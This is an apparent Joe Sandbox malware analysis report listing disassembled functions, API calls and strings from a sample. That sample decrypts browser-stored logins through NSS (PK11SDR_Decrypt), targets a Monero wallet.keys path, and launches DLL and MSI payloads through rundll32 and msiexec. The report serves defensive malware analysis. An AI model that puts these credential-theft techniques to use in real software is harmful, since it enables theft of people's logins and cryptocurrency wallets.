Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d09d4159b6bdd3952d6f6bad293ec7237abcc48b91aaf834597c0d9918ae7014
Instruction ID: 48016892c5675cc3d3199f2ee7dd80e32cc5e8fd767311b7a7385c6301d72dac
Opcode Fuzzy Hash: d09d4159b6bdd3952d6f6bad293ec7237abcc48b91aaf834597c0d9918ae7014
Instruction Fuzzy Hash: 845149B3E08214ABE3146D29EC9577AF7D5DB94720F2B453DEB88A3380E97A5D0142C6

Function 00199160 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 6C6D55F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C6AE1A5), ref: 6C6D5606
LoadLibraryW.KERNEL32(gdi32,?,6C6AE1A5), ref: 6C6D560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C6D5633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C6D563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C6D566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C6D567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C6D5696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C6D56B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C6D56CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C6D56E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C6D56FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C6D5716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C6D572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C6D5748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C6D5761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C6D577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C6D5793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C6D57A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C6D57BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C6D57D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C6D57EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C6D57FF

Strings

LoadIconW, xrefs: 6C6D575B
SetWindowLongPtrW, xrefs: 6C6D57B7
GetThreadDpiAwarenessContext, xrefs: 6C6D562D
LoadCursorW, xrefs: 6C6D5774
EnableNonClientDpiScaling, xrefs: 6C6D5666
AreDpiAwarenessContextsEqual, xrefs: 6C6D5637
SetWindowPos, xrefs: 6C6D56F7
StretchDIBits, xrefs: 6C6D57CC
user32, xrefs: 6C6D5601
ShowWindow, xrefs: 6C6D56DE
ReleaseDC, xrefs: 6C6D5742
gdi32, xrefs: 6C6D560A
GetSystemMetricsForDpi, xrefs: 6C6D5677
GetDpiForWindow, xrefs: 6C6D5690
MonitorFromWindow, xrefs: 6C6D578D
CreateSolidBrush, xrefs: 6C6D57E4
GetMonitorInfoW, xrefs: 6C6D57A2
DeleteObject, xrefs: 6C6D57F9
GetWindowDC, xrefs: 6C6D5710
CreateWindowExW, xrefs: 6C6D56C5
FillRect, xrefs: 6C6D5729
RegisterClassW, xrefs: 6C6D56AC

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: d2966011756a88abf36ab1d4130aa3d4528494eebaa869fa8de4aa165f5c668b
Instruction ID: ecd2db558557c5717d38de9d7c68849a3b39153adceaae49f70f04f4c3a3b96b
Opcode Fuzzy Hash: d2966011756a88abf36ab1d4130aa3d4528494eebaa869fa8de4aa165f5c668b
Instruction Fuzzy Hash: 38514FF0A113129BEB019F36AD84D263AFBAB57385F114429A931E2A41EF70D805CF6D

Function 6C6BCC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C68582D), ref: 6C6BCC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C68582D), ref: 6C6BCC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C6EFE98,?,?,?,?,?,6C68582D), ref: 6C6BCC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C68582D), ref: 6C6BCCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C6BCCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C6BCCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C6BCCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C6BCCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C6BCD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C6BCD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C6BCD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C6BCDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C6BCDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C6BCDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C6BCDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C6BCE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C6BCE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C6BCE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C6BCE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C6BCE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C6BCE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C6BCE8A

Strings

cpuallthreads, xrefs: 6C6BCE16
nostacksampling, xrefs: 6C6BCD7C
nativeallocations, xrefs: 6C6BCDA8
samplingallthreads, xrefs: 6C6BCE2C
java, xrefs: 6C6BCC37
stackwalk, xrefs: 6C6BCCF8
ipcmessages, xrefs: 6C6BCDBE
power, xrefs: 6C6BCE84
leaf, xrefs: 6C6BCC66
unregisteredthreads, xrefs: 6C6BCE58
fileio, xrefs: 6C6BCC92
jsallocations, xrefs: 6C6BCD0E
mainthreadio, xrefs: 6C6BCC7C
Unrecognized feature "%s"., xrefs: 6C6BCEA0
fileioall, xrefs: 6C6BCCA8
noiostacks, xrefs: 6C6BCCBE
default, xrefs: 6C6BCC21
notimerresolutionchange, xrefs: 6C6BCE00
markersallthreads, xrefs: 6C6BCE42
preferencereads, xrefs: 6C6BCD92
screenshots, xrefs: 6C6BCCD4
processcpu, xrefs: 6C6BCE6E
seqstyle, xrefs: 6C6BCCE6
audiocallbacktracing, xrefs: 6C6BCDD4

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 7cc4ec1f92e8d038a2e75618217fd5f30b29c748bf677fb37495980d32dc8376
Instruction ID: eb33a2cc2fe9242b4db6972d19d4383660d1911652fb0c5d369798ba54e1f83d
Opcode Fuzzy Hash: 7cc4ec1f92e8d038a2e75618217fd5f30b29c748bf677fb37495980d32dc8376
Instruction Fuzzy Hash: 895168C5A4B32572FA0032196D247EA1889EF57349F104437EE27B5E80FB259726C7AF

Function 6C684470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C684730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C6844B2,6C6FE21C,6C6FF7F8), ref: 6C68473E
Part of subcall function 6C684730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C68474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C6844BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C6844D2
InitOnceExecuteOnce.KERNEL32(6C6FF80C,6C67F240,?,?), ref: 6C68451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C68455C
LoadLibraryW.KERNEL32(?), ref: 6C684592
InitializeCriticalSection.KERNEL32(6C6FF770), ref: 6C6845A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C6845AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C6845BB
InitOnceExecuteOnce.KERNEL32(6C6FF818,6C67F240,?,?), ref: 6C684612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C684636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C684644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C68466D
VerSetConditionMask.NTDLL ref: 6C68469F
VerSetConditionMask.NTDLL ref: 6C6846AB
VerSetConditionMask.NTDLL ref: 6C6846B2
VerSetConditionMask.NTDLL ref: 6C6846B9
VerSetConditionMask.NTDLL ref: 6C6846C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6846CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C6846F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C6846FD

Strings

WRusr.dll, xrefs: 6C6844B5
kernel32.dll, xrefs: 6C6844CD
l, xrefs: 6C684578
NativeNtBlockSet_Write, xrefs: 6C6846F7
Gol, xrefs: 6C6844FC
user32.dll, xrefs: 6C684557, 6C68463F

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: Gol$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3475055706
Opcode ID: 87a75fe72a1f49769b83e2350a181e03bc0eed09d472d293ba32ef3177ad5bab
Instruction ID: 7c0f11e83dde93449c505f2681fff3361a1cfd80bdca339322d3da4dfa917ae4
Opcode Fuzzy Hash: 87a75fe72a1f49769b83e2350a181e03bc0eed09d472d293ba32ef3177ad5bab
Instruction Fuzzy Hash: 5B6149B0605348AFEB108F62EC95BA57BFAEF47348F048458E5248B641D7F18946CF6E

Function 0018C7D0 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 0018C7E5

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013ACC18,00000000,?,001A13F0,00000000,?,?), ref: 0018C8AC
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0018C8C9
GetFileSize.KERNEL32(00000000,00000000), ref: 0018C8D5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0018C8E8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0018C919
StrStrA.SHLWAPI(?,013ACC30,001A0B37), ref: 0018C937
StrStrA.SHLWAPI(00000000,013ACC48), ref: 0018C95E
StrStrA.SHLWAPI(?,013AD7B8,00000000,?,001A13FC,00000000,?,00000000,00000000,?,013A8A00,00000000,?,001A13F8,00000000,?), ref: 0018CAE2
StrStrA.SHLWAPI(00000000,013AD758), ref: 0018CAF9

Part of subcall function 0018C660: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C6B1
Part of subcall function 0018C660: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C6BC
Part of subcall function 0018C660: PK11_GetInternalKeySlot.NSS3 ref: 0018C6CA
Part of subcall function 0018C660: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0018C6E5
Part of subcall function 0018C660: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0018C72B
Part of subcall function 0018C660: PK11_FreeSlot.NSS3(?), ref: 0018C7A1

StrStrA.SHLWAPI(?,013AD758,00000000,?,001A1400,00000000,?,00000000,013A8A30), ref: 0018CB9A
StrStrA.SHLWAPI(00000000,013A8960), ref: 0018CBB1

Part of subcall function 0018C660: lstrcat.KERNEL32(?,001A0B2E), ref: 0018C783
Part of subcall function 0018C660: lstrcat.KERNEL32(?,001A0B2F), ref: 0018C797
Part of subcall function 0018C660: lstrcat.KERNEL32(?,001A0B33), ref: 0018C7B8

lstrlen.KERNEL32(00000000), ref: 0018CC84
CloseHandle.KERNEL32(00000000), ref: 0018CCDC
NSS_Shutdown.NSS3 ref: 0018CCEA

Strings

, xrefs: 0018C806

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: Filelstrcat$lstrcpy$K11_lstrlen$PointerSlot$AuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalReadShutdownSizeString
String ID:
API String ID: 1052888304-3916222277
Opcode ID: a042dad731a55d09f4ce353610f2c2e3e06f498a8c146cb1670be06853665f2c
Instruction ID: 79edc4b35387bf7619529cab18068d8b2bb8f77aeb319c8f11eba84219050eae
Opcode Fuzzy Hash: a042dad731a55d09f4ce353610f2c2e3e06f498a8c146cb1670be06853665f2c
Instruction Fuzzy Hash: 62E1DB71910108ABCF15EBA4DC96FEEB778BF65300F404169F506661A1EF706A4DCBE2

Function 6C6CD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6CD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD52A
GetCurrentThreadId.KERNEL32 ref: 6C6CD530
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD53F
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD55F
free.MOZGLUE(00000000), ref: 6C6CD585
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C6CD5D3
GetCurrentThreadId.KERNEL32 ref: 6C6CD5F9
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD605
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD652
GetCurrentThreadId.KERNEL32 ref: 6C6CD658
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6CD667
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6CD6A2

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
String ID:
API String ID: 2206442479-0
Opcode ID: 6d430b19fc546ac4fda8cc31e970ab139d28205058faafc6532f19712a3e4237
Instruction ID: ab5e121b7d050da7c858a6d3965035c33af4a6f28329d9b24658b4c924a5e85e
Opcode Fuzzy Hash: 6d430b19fc546ac4fda8cc31e970ab139d28205058faafc6532f19712a3e4237
Instruction Fuzzy Hash: 7A518C75604705EFC704DF35C884A9ABBF5FF8A358F00862EE95A87710DB30A845CB9A

Function 001912B0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,block), ref: 001912D5
ExitProcess.KERNEL32 ref: 001912E1

Strings

block, xrefs: 001912C7

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: ExitProcess
String ID: block
API String ID: 621844428-2199623458
Opcode ID: bc30ec4ca239f59d565a9b611627275fa309c94b7cb368253262143c8aa5cd99
Instruction ID: 36bf20569c8aec540ba18f5f6ff2c4feef1bd8cece58faea25fad9782372a16b
Opcode Fuzzy Hash: bc30ec4ca239f59d565a9b611627275fa309c94b7cb368253262143c8aa5cd99
Instruction Fuzzy Hash: AA517D75A0020AFFCF04DFE0D984AAE77B9BF49704F118058E816A7750D770EA95DB61

Function 00192940 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

ShellExecuteEx.SHELL32(0000003C), ref: 00192CD5
ShellExecuteEx.SHELL32(0000003C), ref: 00192E6D
ShellExecuteEx.SHELL32(0000003C), ref: 00192FFA

Strings

.dll, xrefs: 00192CF5
"" , xrefs: 00192BAA
/passive, xrefs: 00192F6B
<, xrefs: 00192FA0
.msi, xrefs: 00192EA8
/i ", xrefs: 00192EF4
C:\Windows\system32\msiexec.exe, xrefs: 00192FCF
C:\Windows\system32\rundll32.exe, xrefs: 00192E42

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
